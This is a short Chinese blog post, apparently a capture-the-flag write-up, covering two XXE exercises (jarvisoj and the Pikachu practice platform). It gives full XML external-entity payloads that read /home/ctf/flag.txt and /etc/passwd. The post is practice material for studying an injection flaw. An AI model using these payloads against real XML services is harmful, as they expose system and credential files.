美文网首页
XXE CTF题目

XXE CTF题目

作者: 小小怪吃吃吃 | 来源:发表于2018-10-25 17:46 被阅读0次

api调用

1、链接:jarvisoj

2、解题方法:
xxe漏洞读取文件。
payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poem [
 <!ENTITY xxe SYSTEM "file:///home/ctf/flag.txt">
 ]>
<poem>
  &xxe;
</poem>
image.png

Pikachu漏洞联系平台-XXE

1、解题方法:
题目已经给出api,抓包发现接口处参数经过url编码。


image.png

payload(记得进行url编码):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poem [
 <!ENTITY xxe SYSTEM "file:///etc/passwd">
 ]>
<poem>
  &xxe;
</poem>

2、源码分析


image.png

相关文章

网友评论

      本文标题:XXE CTF题目

      本文链接:https://www.haomeiwen.com/subject/lphctqtx.html